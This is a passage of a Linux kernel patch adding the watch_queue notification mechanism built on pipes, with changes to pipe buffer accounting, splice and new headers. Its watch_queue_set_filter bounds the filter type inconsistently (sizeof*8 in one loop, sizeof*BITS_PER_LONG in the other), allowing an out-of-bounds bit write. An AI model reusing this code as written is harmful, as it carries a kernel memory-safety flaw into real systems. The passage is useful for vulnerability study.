watch_queue_set_size(pipe, arg); + __pipe_unlock(pipe); + return ret; + } + + case IOC_WATCH_QUEUE_SET_FILTER: + return watch_queue_set_filter( + pipe, (struct watch_notification_filter __user *)arg); +#endif + + default: + return -ENOIOCTLCMD; } } @@ -754,27 +777,27 @@ pipe_fasync(int fd, struct file *filp, int on) return retval; } -static unsigned long account_pipe_buffers(struct user_struct *user, - unsigned long old, unsigned long new) +unsigned long account_pipe_buffers(struct user_struct *user, + unsigned long old, unsigned long new) { return atomic_long_add_return(new - old, &user->pipe_bufs); } -static bool too_many_pipe_buffers_soft(unsigned long user_bufs) +bool too_many_pipe_buffers_soft(unsigned long user_bufs) { unsigned long soft_limit = READ_ONCE(pipe_user_pages_soft); return soft_limit && user_bufs > soft_limit; } -static bool too_many_pipe_buffers_hard(unsigned long user_bufs) +bool too_many_pipe_buffers_hard(unsigned long user_bufs) { unsigned long hard_limit = READ_ONCE(pipe_user_pages_hard); return hard_limit && user_bufs > hard_limit; } -static bool is_unprivileged_user(void) +bool pipe_is_unprivileged_user(void) { return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN); } @@ -796,12 +819,12 @@ struct pipe_inode_info *alloc_pipe_info(void) user_bufs = account_pipe_buffers(user, 0, pipe_bufs); - if (too_many_pipe_buffers_soft(user_bufs) && is_unprivileged_user()) { + if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) { user_bufs = account_pipe_buffers(user, pipe_bufs, 1); pipe_bufs = 1; } - if (too_many_pipe_buffers_hard(user_bufs) && is_unprivileged_user()) + if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user()) goto out_revert_acct; pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), @@ -813,6 +836,7 @@ struct pipe_inode_info *alloc_pipe_info(void) pipe->r_counter = pipe->w_counter = 1; pipe->max_usage = pipe_bufs; pipe->ring_size = pipe_bufs; + pipe->nr_accounted = pipe_bufs; pipe->user = user; mutex_init(&pipe->mutex); return pipe; @@ -830,7 +854,14 @@ void free_pipe_info(struct pipe_inode_info *pipe) { int i; - (void) account_pipe_buffers(pipe->user, pipe->ring_size, 0); +#ifdef CONFIG_WATCH_QUEUE + if (pipe->watch_queue) { + watch_queue_clear(pipe->watch_queue); + put_watch_queue(pipe->watch_queue); + } +#endif + + (void) account_pipe_buffers(pipe->user, pipe->nr_accounted, 0); free_uid(pipe->user); for (i = 0; i < pipe->ring_size; i++) { struct pipe_buffer *buf = pipe->bufs + i; @@ -906,6 +937,17 @@ int create_pipe_files(struct file **res, int flags) if (!inode) return -ENFILE; + if (flags & O_NOTIFICATION_PIPE) { +#ifdef CONFIG_WATCH_QUEUE + if (watch_queue_init(inode->i_pipe) < 0) { + iput(inode); + return -ENOMEM; + } +#else + return -ENOPKG; +#endif + } + f = alloc_file_pseudo(inode, pipe_mnt, "", O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)), &pipefifo_fops); @@ -936,7 +978,7 @@ static int __do_pipe_flags(int *fd, struct file **files, int flags) int error; int fdw, fdr; - if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT)) + if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE)) return -EINVAL; error = create_pipe_files(files, flags); @@ -1184,42 +1226,12 @@ unsigned int round_pipe_size(unsigned long size) } /* - * Allocate a new array of pipe buffers and copy the info over. Returns the - * pipe size if successful, or return -ERROR on error. + * Resize the pipe ring to a number of slots. */ -static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg) +int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots) { struct pipe_buffer *bufs; - unsigned int size, nr_slots, head, tail, mask, n; - unsigned long user_bufs; - long ret = 0; - - size = round_pipe_size(arg); - nr_slots = size >> PAGE_SHIFT; - - if (!nr_slots) - return -EINVAL; - - /* - * If trying to increase the pipe capacity, check that an - * unprivileged user is not trying to exceed various limits - * (soft limit check here, hard limit check just below). - * Decreasing the pipe capacity is always permitted, even - * if the user is currently over a limit. - */ - if (nr_slots > pipe->ring_size && - size > pipe_max_size && !capable(CAP_SYS_RESOURCE)) - return -EPERM; - - user_bufs = account_pipe_buffers(pipe->user, pipe->ring_size, nr_slots); - - if (nr_slots > pipe->ring_size && - (too_many_pipe_buffers_hard(user_bufs) || - too_many_pipe_buffers_soft(user_bufs)) && - is_unprivileged_user()) { - ret = -EPERM; - goto out_revert_acct; - } + unsigned int head, tail, mask, n; /* * We can shrink the pipe, if arg is greater than the ring occupancy. @@ -1231,17 +1243,13 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg) head = pipe->head; tail = pipe->tail; n = pipe_occupancy(pipe->head, pipe->tail); - if (nr_slots < n) { - ret = -EBUSY; - goto out_revert_acct; - } + if (nr_slots < n) + return -EBUSY; bufs = kcalloc(nr_slots, sizeof(*bufs), GFP_KERNEL_ACCOUNT | __GFP_NOWARN); - if (unlikely(!bufs)) { - ret = -ENOMEM; - goto out_revert_acct; - } + if (unlikely(!bufs)) + return -ENOMEM; /* * The pipe array wraps around, so just start the new one at zero @@ -1269,16 +1277,68 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg) kfree(pipe->bufs); pipe->bufs = bufs; pipe->ring_size = nr_slots; - pipe->max_usage = nr_slots; + if (pipe->max_usage > nr_slots) + pipe->max_usage = nr_slots; pipe->tail = tail; pipe->head = head; /* This might have made more room for writers */ wake_up_interruptible(&pipe->wr_wait); + return 0; +} + +/* + * Allocate a new array of pipe buffers and copy the info over. Returns the + * pipe size if successful, or return -ERROR on error. + */ +static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg) +{ + unsigned long user_bufs; + unsigned int nr_slots, size; + long ret = 0; + +#ifdef CONFIG_WATCH_QUEUE + if (pipe->watch_queue) + return -EBUSY; +#endif + + size = round_pipe_size(arg); + nr_slots = size >> PAGE_SHIFT; + + if (!nr_slots) + return -EINVAL; + + /* + * If trying to increase the pipe capacity, check that an + * unprivileged user is not trying to exceed various limits + * (soft limit check here, hard limit check just below). + * Decreasing the pipe capacity is always permitted, even + * if the user is currently over a limit. + */ + if (nr_slots > pipe->max_usage && + size > pipe_max_size && !capable(CAP_SYS_RESOURCE)) + return -EPERM; + + user_bufs = account_pipe_buffers(pipe->user, pipe->nr_accounted, nr_slots); + + if (nr_slots > pipe->max_usage && + (too_many_pipe_buffers_hard(user_bufs) || + too_many_pipe_buffers_soft(user_bufs)) && + pipe_is_unprivileged_user()) { + ret = -EPERM; + goto out_revert_acct; + } + + ret = pipe_resize_ring(pipe, nr_slots); + if (ret < 0) + goto out_revert_acct; + + pipe->max_usage = nr_slots; + pipe->nr_accounted = nr_slots; return pipe->max_usage * PAGE_SIZE; out_revert_acct: - (void) account_pipe_buffers(pipe->user, nr_slots, pipe->ring_size); + (void) account_pipe_buffers(pipe->user, nr_slots, pipe->nr_accounted); return ret; } @@ -1287,9 +1347,17 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg) * location, so checking ->i_pipe is not enough to verify that this is a * pipe. */ -struct pipe_inode_info *get_pipe_info(struct file *file) +struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice) { - return file->f_op == &pipefifo_fops ? file->private_data : NULL; + struct pipe_inode_info *pipe = file->private_data; + + if (file->f_op != &pipefifo_fops || !pipe) + return NULL; +#ifdef CONFIG_WATCH_QUEUE + if (for_splice && pipe->watch_queue) + return NULL; +#endif + return pipe; } long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg) @@ -1297,7 +1365,7 @@ long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg) struct pipe_inode_info *pipe; long ret; - pipe = get_pipe_info(file); + pipe = get_pipe_info(file, false); if (!pipe) return -EBADF; diff --git a/fs/splice.c b/fs/splice.c index d671936d0aad..6e6ea30c72b4 100644 --- a/fs/splice.c +++ b/fs/splice.c @@ -1118,8 +1118,8 @@ static long do_splice(struct file *in, loff_t __user *off_in, loff_t offset; long ret; - ipipe = get_pipe_info(in); - opipe = get_pipe_info(out); + ipipe = get_pipe_info(in, true); + opipe = get_pipe_info(out, true); if (ipipe && opipe) { if (off_in || off_out) @@ -1278,7 +1278,7 @@ static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf, static long vmsplice_to_user(struct file *file, struct iov_iter *iter, unsigned int flags) { - struct pipe_inode_info *pipe = get_pipe_info(file); + struct pipe_inode_info *pipe = get_pipe_info(file, true); struct splice_desc sd = { .total_len = iov_iter_count(iter), .flags = flags, @@ -1313,7 +1313,7 @@ static long vmsplice_to_pipe(struct file *file, struct iov_iter *iter, if (flags & SPLICE_F_GIFT) buf_flag = PIPE_BUF_FLAG_GIFT; - pipe = get_pipe_info(file); + pipe = get_pipe_info(file, true); if (!pipe) return -EBADF; @@ -1766,8 +1766,8 @@ static int link_pipe(struct pipe_inode_info *ipipe, static long do_tee(struct file *in, struct file *out, size_t len, unsigned int flags) { - struct pipe_inode_info *ipipe = get_pipe_info(in); - struct pipe_inode_info *opipe = get_pipe_info(out); + struct pipe_inode_info *ipipe = get_pipe_info(in, true); + struct pipe_inode_info *opipe = get_pipe_info(out, true); int ret = -EINVAL; /* diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h index ae58fad7f1e0..1d3eaa233f4a 100644 --- a/include/linux/pipe_fs_i.h +++ b/include/linux/pipe_fs_i.h @@ -35,6 +35,7 @@ struct pipe_buffer { * @tail: The point of buffer consumption * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) + * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe @@ -45,6 +46,7 @@ struct pipe_buffer { * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe + * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ struct pipe_inode_info { struct mutex mutex; @@ -53,6 +55,7 @@ struct pipe_inode_info { unsigned int tail; unsigned int max_usage; unsigned int ring_size; + unsigned int nr_accounted; unsigned int readers; unsigned int writers; unsigned int files; @@ -63,6 +66,9 @@ struct pipe_inode_info { struct fasync_struct *fasync_writers; struct pipe_buffer *bufs; struct user_struct *user; +#ifdef CONFIG_WATCH_QUEUE + struct watch_queue *watch_queue; +#endif }; /* @@ -237,9 +243,20 @@ void pipe_buf_mark_unmergeable(struct pipe_buffer *buf); extern const struct pipe_buf_operations nosteal_pipe_buf_ops; +#ifdef CONFIG_WATCH_QUEUE +unsigned long account_pipe_buffers(struct user_struct *user, + unsigned long old, unsigned long new); +bool too_many_pipe_buffers_soft(unsigned long user_bufs); +bool too_many_pipe_buffers_hard(unsigned long user_bufs); +bool pipe_is_unprivileged_user(void); +#endif + /* for F_SETPIPE_SZ and F_GETPIPE_SZ */ +#ifdef CONFIG_WATCH_QUEUE +int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots); +#endif long pipe_fcntl(struct file *, unsigned int, unsigned long arg); -struct pipe_inode_info *get_pipe_info(struct file *file); +struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice); int create_pipe_files(struct file **, int); unsigned int round_pipe_size(unsigned long size); diff --git a/include/linux/watch_queue.h b/include/linux/watch_queue.h new file mode 100644 index 000000000000..5e08db2adc31 --- /dev/null +++ b/include/linux/watch_queue.h @@ -0,0 +1,127 @@ +// SPDX-License-Identifier: GPL-2.0 +/* User-mappable watch queue + * + * Copyright (C) 2020 Red Hat, Inc. All Rights Reserved. + * Written by David Howells (dhowells at redhat.com) + * + * See Documentation/watch_queue.rst + */ + +#ifndef _LINUX_WATCH_QUEUE_H +#define _LINUX_WATCH_QUEUE_H + +#include <uapi/linux/watch_queue.h> +#include <linux/kref.h> +#include <linux/rcupdate.h> + +#ifdef CONFIG_WATCH_QUEUE + +struct cred; + +struct watch_type_filter { + enum watch_notification_type type; + __u32 subtype_filter[1]; /* Bitmask of subtypes to filter on */ + __u32 info_filter; /* Filter on watch_notification::info */ + __u32 info_mask; /* Mask of relevant bits in info_filter */ +}; + +struct watch_filter { + union { + struct rcu_head rcu; + unsigned long type_filter[2]; /* Bitmask of accepted types */ + }; + u32 nr_filters; /* Number of filters */ + struct watch_type_filter filters[]; +}; + +struct watch_queue { + struct rcu_head rcu; + struct watch_filter __rcu *filter; + struct pipe_inode_info *pipe; /* The pipe we're using as a buffer */ + struct hlist_head watches; /* Contributory watches */ + struct page **notes; /* Preallocated notifications */ + unsigned long *notes_bitmap; /* Allocation bitmap for notes */ + struct kref usage; /* Object usage count */ + spinlock_t lock; + unsigned int nr_notes; /* Number of notes */ + unsigned int nr_pages; /* Number of pages in notes[] */ + bool defunct; /* T when queues closed */ +}; + +/* + * Representation of a watch on an object. + */ +struct watch { + union { + struct rcu_head rcu; + u32 info_id; /* ID to be OR'd in to info field */ + }; + struct watch_queue __rcu *queue; /* Queue to post events to */ + struct hlist_node queue_node; /* Link in queue->watches */ + struct watch_list __rcu *watch_list; + struct hlist_node list_node; /* Link in watch_list->watchers */ + const struct cred *cred; /* Creds of the owner of the watch */ + void *private; /* Private data for the watched object */ + u64 id; /* Internal identifier */ + struct kref usage; /* Object usage count */ +}; + +/* + * List of watches on an object. + */ +struct watch_list { + struct rcu_head rcu; + struct hlist_head watchers; + void (*release_watch)(struct watch *); + spinlock_t lock; +}; + +extern void __post_watch_notification(struct watch_list *, + struct watch_notification *, + const struct cred *, + u64); +extern struct watch_queue *get_watch_queue(int); +extern void put_watch_queue(struct watch_queue *); +extern void init_watch(struct watch *, struct watch_queue *); +extern int add_watch_to_object(struct watch *, struct watch_list *); +extern int remove_watch_from_object(struct watch_list *, struct watch_queue *, u64, bool); +extern long watch_queue_set_size(struct pipe_inode_info *, unsigned int); +extern long watch_queue_set_filter(struct pipe_inode_info *, + struct watch_notification_filter __user *); +extern int watch_queue_init(struct pipe_inode_info *); +extern void watch_queue_clear(struct watch_queue *); + +static inline void init_watch_list(struct watch_list *wlist, + void (*release_watch)(struct watch *)) +{ + INIT_HLIST_HEAD(&wlist->watchers); + spin_lock_init(&wlist->lock); + wlist->release_watch = release_watch; +} + +static inline void post_watch_notification(struct watch_list *wlist, + struct watch_notification *n, + const struct cred *cred, + u64 id) +{ + if (unlikely(wlist)) + __post_watch_notification(wlist, n, cred, id); +} + +static inline void remove_watch_list(struct watch_list *wlist, u64 id) +{ + if (wlist) { + remove_watch_from_object(wlist, NULL, id, true); + kfree_rcu(wlist, rcu); + } +} + +/** + * watch_sizeof - Calculate the information part of the size of a watch record, + * given the structure size. + */ +#define watch_sizeof(STRUCT) (sizeof(STRUCT) << WATCH_INFO_LENGTH__SHIFT) + +#endif + +#endif /* _LINUX_WATCH_QUEUE_H */ diff --git a/include/uapi/linux/watch_queue.h b/include/uapi/linux/watch_queue.h index 9df72227f515..3a5790f1f05d 100644 --- a/include/uapi/linux/watch_queue.h +++ b/include/uapi/linux/watch_queue.h @@ -4,9 +4,13 @@ #include <linux/types.h> #include <linux/fcntl.h> +#include <linux/ioctl.h> #define O_NOTIFICATION_PIPE O_EXCL /* Parameter to pipe2() selecting notification pipe */ +#define IOC_WATCH_QUEUE_SET_SIZE _IO('W', 0x60) /* Set the size in pages */ +#define IOC_WATCH_QUEUE_SET_FILTER _IO('W', 0x61) /* Set the filter */ + enum watch_notification_type { WATCH_TYPE_META = 0, /* Special record */ WATCH_TYPE__NR = 1 @@ -41,6 +45,22 @@ struct watch_notification { #define WATCH_INFO_FLAG_7 0x00800000 }; +/* + * Notification filtering rules (IOC_WATCH_QUEUE_SET_FILTER). + */ +struct watch_notification_type_filter { + __u32 type; /* Type to apply filter to */ + __u32 info_filter; /* Filter on watch_notification::info */ + __u32 info_mask; /* Mask of relevant bits in info_filter */ + __u32 subtype_filter[8]; /* Bitmask of subtypes to filter on */ +}; + +struct watch_notification_filter { + __u32 nr_filters; /* Number of filters */ + __u32 __reserved; /* Must be 0 */ + struct watch_notification_type_filter filters[]; +}; + /* * Extended watch removal notification. This is used optionally if the type diff --git a/init/Kconfig b/init/Kconfig index 452bc1835cd4..5432803d8efc 100644 --- a/init/Kconfig +++ b/init/Kconfig @@ -339,6 +339,18 @@ config POSIX_MQUEUE_SYSCTL depends on SYSCTL default y +config WATCH_QUEUE + bool "General notification queue" + default n + help + + This is a general notification queue for the kernel to pass events to + userspace by splicing them into pipes. It can be used in conjunction + with watches for key/keyring change notifications and device + notifications. + + See Documentation/watch_queue.rst + config CROSS_MEMORY_ATTACH bool "Enable process_vm_readv/writev syscalls" depends on MMU diff --git a/kernel/Makefile b/kernel/Makefile index 4cb4130ced32..41e7e3ae07ec 100644 --- a/kernel/Makefile +++ b/kernel/Makefile @@ -115,6 +115,7 @@ obj-$(CONFIG_TORTURE_TEST) += torture.o obj-$(CONFIG_HAS_IOMEM) += iomem.o obj-$(CONFIG_RSEQ) += rseq.o +obj-$(CONFIG_WATCH_QUEUE) += watch_queue.o obj-$(CONFIG_SYSCTL_KUNIT_TEST) += sysctl-test.o diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c new file mode 100644 index 000000000000..c103e34f8705 --- /dev/null +++ b/kernel/watch_queue.c @@ -0,0 +1,657 @@ +// SPDX-License-Identifier: GPL-2.0 +/* Watch queue and general notification mechanism, built on pipes + * + * Copyright (C) 2020 Red Hat, Inc. All Rights Reserved. + * Written by David Howells (dhowells at redhat.com) + * + * See Documentation/watch_queue.rst + */ + +#define pr_fmt(fmt) "watchq: " fmt +#include <linux/module.h> +#include <linux/init.h> +#include <linux/sched.h> +#include <linux/slab.h> +#include <linux/printk.h> +#include <linux/miscdevice.h> +#include <linux/fs.h> +#include <linux/mm.h> +#include <linux/pagemap.h> +#include <linux/poll.h> +#include <linux/uaccess.h> +#include <linux/vmalloc.h> +#include <linux/file.h> +#include <linux/security.h> +#include <linux/cred.h> +#include <linux/sched/signal.h> +#include <linux/watch_queue.h> +#include <linux/pipe_fs_i.h> + +MODULE_DESCRIPTION("Watch queue"); +MODULE_AUTHOR("Red Hat, Inc."); +MODULE_LICENSE("GPL"); + +#define WATCH_QUEUE_NOTE_SIZE 128 +#define WATCH_QUEUE_NOTES_PER_PAGE (PAGE_SIZE / WATCH_QUEUE_NOTE_SIZE) + +static void watch_queue_pipe_buf_release(struct pipe_inode_info *pipe, + struct pipe_buffer *buf) +{ + struct watch_queue *wqueue = (struct watch_queue *)buf->private; + struct page *page; + unsigned int bit; + + /* We need to work out which note within the page this refers to, but + * the note might have been maximum size, so merely ANDing the offset + * off doesn't work. OTOH, the note must've been more than zero size. + */ + bit = buf->offset + buf->len; + if ((bit & (WATCH_QUEUE_NOTE_SIZE - 1)) == 0) + bit -= WATCH_QUEUE_NOTE_SIZE; + bit /= WATCH_QUEUE_NOTE_SIZE; + + page = buf->page; + bit += page->index; + + set_bit(bit, wqueue->notes_bitmap); +} + +static int watch_queue_pipe_buf_steal(struct pipe_inode_info *pipe, + struct pipe_buffer *buf) +{ + return -1; /* No. */ +} + +/* New data written to a pipe may be appended to a buffer with this type. */ +static const struct pipe_buf_operations watch_queue_pipe_buf_ops = { + .confirm = generic_pipe_buf_confirm, + .release = watch_queue_pipe_buf_release, + .steal = watch_queue_pipe_buf_steal, + .get = generic_pipe_buf_get, +}; + +/* + * Post a notification to a watch queue. + */ +static bool post_one_notification(struct watch_queue *wqueue, + struct watch_notification *n) +{ + void *p; + struct pipe_inode_info *pipe = wqueue->pipe; + struct pipe_buffer *buf; + struct page *page; + unsigned int head, tail, mask, note, offset, len; + bool done = false; + + if (!pipe) + return false; + + spin_lock_irq(&pipe->rd_wait.lock); + + if (wqueue->defunct) + goto out; + + mask = pipe->ring_size - 1; + head = pipe->head; + tail = pipe->tail; + if (pipe_full(head, tail, pipe->ring_size)) + goto lost; + + note = find_first_bit(wqueue->notes_bitmap, wqueue->nr_notes); + if (note >= wqueue->nr_notes) + goto lost; + + page = wqueue->notes[note / WATCH_QUEUE_NOTES_PER_PAGE]; + offset = note % WATCH_QUEUE_NOTES_PER_PAGE * WATCH_QUEUE_NOTE_SIZE; + get_page(page); + len = n->info & WATCH_INFO_LENGTH; + p = kmap_atomic(page); + memcpy(p + offset, n, len); + kunmap_atomic(p); + + buf = &pipe->bufs[head & mask]; + buf->page = page; + buf->private = (unsigned long)wqueue; + buf->ops = &watch_queue_pipe_buf_ops; + buf->offset = offset; + buf->len = len; + buf->flags = 0; + pipe->head = head + 1; + + if (!test_and_clear_bit(note, wqueue->notes_bitmap)) { + spin_unlock_irq(&pipe->rd_wait.lock); + BUG(); + } + wake_up_interruptible_sync_poll_locked(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); + done = true; + +out: + spin_unlock_irq(&pipe->rd_wait.lock); + if (done) + kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); + return done; + +lost: + goto out; +} + +/* + * Apply filter rules to a notification. + */ +static bool filter_watch_notification(const struct watch_filter *wf, + const struct watch_notification *n) +{ + const struct watch_type_filter *wt; + unsigned int st_bits = sizeof(wt->subtype_filter[0]) * 8; + unsigned int st_index = n->subtype / st_bits; + unsigned int st_bit = 1U << (n->subtype % st_bits); + int i; + + if (!test_bit(n->type, wf->type_filter)) + return false; + + for (i = 0; i < wf->nr_filters; i++) { + wt = &wf->filters[i]; + if (n->type == wt->type && + (wt->subtype_filter[st_index] & st_bit) && + (n->info & wt->info_mask) == wt->info_filter) + return true; + } + + return false; /* If there is a filter, the default is to reject. */ +} + +/** + * __post_watch_notification - Post an event notification + * @wlist: The watch list to post the event to. + * @n: The notification record to post. + * @cred: The creds of the process that triggered the notification. + * @id: The ID to match on the watch. + * + * Post a notification of an event into a set of watch queues and let the users + * know. + * + * The size of the notification should be set in n->info & WATCH_INFO_LENGTH and + * should be in units of sizeof(*n). + */ +void __post_watch_notification(struct watch_list *wlist, + struct watch_notification *n, + const struct cred *cred, + u64 id) +{ + const struct watch_filter *wf; + struct watch_queue *wqueue; + struct watch *watch; + + if (((n->info & WATCH_INFO_LENGTH) >> WATCH_INFO_LENGTH__SHIFT) == 0) { + WARN_ON(1); + return; + } + + rcu_read_lock(); + + hlist_for_each_entry_rcu(watch, &wlist->watchers, list_node) { + if (watch->id != id) + continue; + n->info &= ~WATCH_INFO_ID; + n->info |= watch->info_id; + + wqueue = rcu_dereference(watch->queue); + wf = rcu_dereference(wqueue->filter); + if (wf && !filter_watch_notification(wf, n)) + continue; + + if (security_post_notification(watch->cred, cred, n) < 0) + continue; + + post_one_notification(wqueue, n); + } + + rcu_read_unlock(); +} +EXPORT_SYMBOL(__post_watch_notification); + +/* + * Allocate sufficient pages to preallocation for the requested number of + * notifications. + */ +long watch_queue_set_size(struct pipe_inode_info *pipe, unsigned int nr_notes) +{ + struct watch_queue *wqueue = pipe->watch_queue; + struct page **pages; + unsigned long *bitmap; + unsigned long user_bufs; + unsigned int bmsize; + int ret, i, nr_pages; + + if (!wqueue) + return -ENODEV; + if (wqueue->notes) + return -EBUSY; + + if (nr_notes < 1 || + nr_notes > 512) /* TODO: choose a better hard limit */ + return -EINVAL; + + nr_pages = (nr_notes + WATCH_QUEUE_NOTES_PER_PAGE - 1); + nr_pages /= WATCH_QUEUE_NOTES_PER_PAGE; + user_bufs = account_pipe_buffers(pipe->user, pipe->nr_accounted, nr_pages); + + if (nr_pages > pipe->max_usage && + (too_many_pipe_buffers_hard(user_bufs) || + too_many_pipe_buffers_soft(user_bufs)) && + pipe_is_unprivileged_user()) { + ret = -EPERM; + goto error; + } + + ret = pipe_resize_ring(pipe, nr_notes); + if (ret < 0) + goto error; + + pages = kcalloc(sizeof(struct page *), nr_pages, GFP_KERNEL); + if (!pages) + goto error; + + for (i = 0; i < nr_pages; i++) { + pages[i] = alloc_page(GFP_KERNEL); + if (!pages[i]) + goto error_p; + pages[i]->index = i * WATCH_QUEUE_NOTES_PER_PAGE; + } + + bmsize = (nr_notes + BITS_PER_LONG - 1) / BITS_PER_LONG; + bmsize *= sizeof(unsigned long); + bitmap = kmalloc(bmsize, GFP_KERNEL); + if (!bitmap) + goto error_p; + + memset(bitmap, 0xff, bmsize); + wqueue->notes = pages; + wqueue->notes_bitmap = bitmap; + wqueue->nr_pages = nr_pages; + wqueue->nr_notes = nr_pages * WATCH_QUEUE_NOTES_PER_PAGE; + return 0; + +error_p: + for (i = 0; i < nr_pages; i++) + __free_page(pages[i]); + kfree(pages); +error: + (void) account_pipe_buffers(pipe->user, nr_pages, pipe->nr_accounted); + return ret; +} + +/* + * Set the filter on a watch queue. + */ +long watch_queue_set_filter(struct pipe_inode_info *pipe, + struct watch_notification_filter __user *_filter) +{ + struct watch_notification_type_filter *tf; + struct watch_notification_filter filter; + struct watch_type_filter *q; + struct watch_filter *wfilter; + struct watch_queue *wqueue = pipe->watch_queue; + int ret, nr_filter = 0, i; + + if (!wqueue) + return -ENODEV; + + if (!_filter) { + /* Remove the old filter */ + wfilter = NULL; + goto set; + } + + /* Grab the user's filter specification */ + if (copy_from_user(&filter, _filter, sizeof(filter)) != 0) + return -EFAULT; + if (filter.nr_filters == 0 || + filter.nr_filters > 16 || + filter.__reserved != 0) + return -EINVAL; + + tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf)); + if (IS_ERR(tf)) + return PTR_ERR(tf); + + ret = -EINVAL; + for (i = 0; i < filter.nr_filters; i++) { + if ((tf[i].info_filter & ~tf[i].info_mask) || + tf[i].info_mask & WATCH_INFO_LENGTH) + goto err_filter; + /* Ignore any unknown types */ + if (tf[i].type >= sizeof(wfilter->type_filter) * 8) + continue; + nr_filter++; + } + + /* Now we need to build the internal filter from only the relevant + * user-specified filters. + */ + ret = -ENOMEM; + wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL); + if (!wfilter) + goto err_filter; + wfilter->nr_filters = nr_filter; + + q = wfilter->filters; + for (i = 0; i < filter.nr_filters; i++) { + if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG) + continue; + + q->type = tf[i].type; + q->info_filter = tf[i].info_filter; + q->info_mask = tf[i].info_mask; + q->subtype_filter[0] = tf[i].subtype_filter[0]; + __set_bit(q->type, wfilter->type_filter); + q++; + } + + kfree(tf); +set: + pipe_lock(pipe); + wfilter = rcu_replace_pointer(wqueue->filter, wfilter, + lockdep_is_held(&pipe->mutex)); + pipe_unlock(pipe); + if (wfilter) + kfree_rcu(wfilter, rcu); + return 0; + +err_filter: + kfree(tf); + return ret; +} + +static void __put_watch_queue(struct kref *kref) +{ + struct watch_queue *wqueue = + container_of(kref, struct watch_queue, usage); + struct watch_filter *wfilter; + int i; + + for (i = 0; i < wqueue->nr_pages; i++) + __free_page(wqueue->notes[i]); + + wfilter = rcu_access_pointer(wqueue->filter); + if (wfilter) + kfree_rcu(wfilter, rcu); + kfree_rcu(wqueue, rcu); +} + +/** + * put_watch_queue - Dispose of a ref on a watchqueue. + * @wqueue: The watch queue to unref. + */ +void put_watch_queue(struct watch_queue *wqueue) +{ + kref_put(&wqueue->usage, __put_watch_queue); +} +EXPORT_SYMBOL(put_watch_queue); + +static void free_watch(struct rcu_head *rcu) +{ + struct watch *watch = container_of(rcu, struct watch, rcu); + + put_watch_queue(rcu_access_pointer(watch->queue)); + put_cred(watch->cred); +} + +static void __put_watch(struct kref *kref) +{ + struct watch *watch = container_of(kref, struct watch, usage); + + call_rcu(&watch->rcu, free_watch); +} + +/* + * Discard a watch. + */ +static void put_watch(struct watch *watch) +{ + kref_put(&watch->usage, __put_watch); +} + +/** + * init_watch_queue - Initialise a watch + * @watch: The watch to initialise. + * @wqueue: The queue to assign. + * + * Initialise a watch and set the watch queue. + */ +void init_watch(struct watch *watch, struct watch_queue *wqueue) +{ + kref_init(&watch->usage); + INIT_HLIST_NODE(&watch->list_node); + INIT_HLIST_NODE(&watch->queue_node); + rcu_assign_pointer(watch->queue, wqueue); +} + +/** + * add_watch_to_object - Add a watch on an object to a watch list + * @watch: The watch to add + * @wlist: The watch list to add to + * + * @watch->queue must have been set to point to the queue to post notifications + * to and the watch list of the object to be watched. @watch->cred must also + * have been set to the appropriate credentials and a ref taken on them. + * + * The caller must pin the queue and the list both and must hold the list + * locked against racing watch additions/removals. + */ +int add_watch_to_object(struct watch *watch, struct watch_list *wlist) +{ + struct watch_queue *wqueue = rcu_access_pointer(watch->queue); + struct watch *w; + + hlist_for_each_entry(w, &wlist->watchers, list_node) { + struct watch_queue *wq = rcu_access_pointer(w->queue); + if (wqueue == wq && watch->id == w->id) + return -EBUSY; + } + + watch->cred = get_current_cred(); + rcu_assign_pointer(watch->watch_list, wlist); + + spin_lock_bh(&wqueue->lock); + kref_get(&wqueue->usage); + kref_get(&watch->usage); + hlist_add_head(&watch->queue_node, &wqueue->watches); + spin_unlock_bh(&wqueue->lock); + + hlist_add_head(&watch->list_node, &wlist->watchers); + return 0; +} +EXPORT_SYMBOL(add_watch_to_object); + +/** + * remove_watch_from_object - Remove a watch or all watches from an object. + * @wlist: The watch list to remove from + * @wq: The watch queue of interest (ignored if @all is true) + * @id: The ID of the watch to remove (ignored if @all is true) + * @all: True to remove all objects + * + * Remove a specific watch or all watches from an object. A notification is + * sent to the watcher to tell them that this happened. + */ +int remove_watch_from_object(struct watch_list *wlist, struct watch_queue *wq, + u64 id, bool all) +{ + struct watch_notification_removal n; + struct watch_queue *wqueue; + struct watch *watch; + int ret = -EBADSLT; + + rcu_read_lock(); + +again: + spin_lock(&wlist->lock); + hlist_for_each_entry(watch, &wlist->watchers, list_node) { + if (all || + (watch->id == id && rcu_access_pointer(watch->queue) == wq)) + goto found; + } + spin_unlock(&wlist->lock); + goto out; + +found: + ret = 0; + 